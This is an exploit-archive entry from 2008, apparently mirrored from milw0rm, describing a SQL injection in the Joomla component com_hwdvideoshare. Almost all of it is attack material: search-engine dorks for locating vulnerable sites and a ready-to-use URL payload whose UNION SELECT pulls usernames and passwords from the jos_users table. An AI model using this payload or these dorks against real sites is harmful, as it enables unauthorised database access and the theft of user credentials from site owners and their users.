Joomla Component com_hwdvideoshare SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component com_hwdvideoshare SQL Injection Vulnerability
# Published : 2008-02-20
# Author : S@BUN
# Previous Title : PHP-Nuke Modules Okul 1.0 (okulid) Remote SQL Injection Vulnerability
# Next Title : PHP-Nuke Module Docum (artid) SQL Injection Vulnerability

###############################################################
#
# joomla SQL Injection(com_hwdvideoshare)+Powered by hwdVideoShare
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MA?°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : Powered by hwdVideoShare
#
# DORK 2 : allinurl: com_hwdvideoshare
#
################################################################
EXPLOIT : S?°METiMES YOU NEED LOGiN

index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/000,111,222,username,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2/**/from/**/jos_users/*

################################################################
# S@BUN             i AM NOT HACKER                   S@BUN
################################################################

# www.Syue.com [2008-02-20]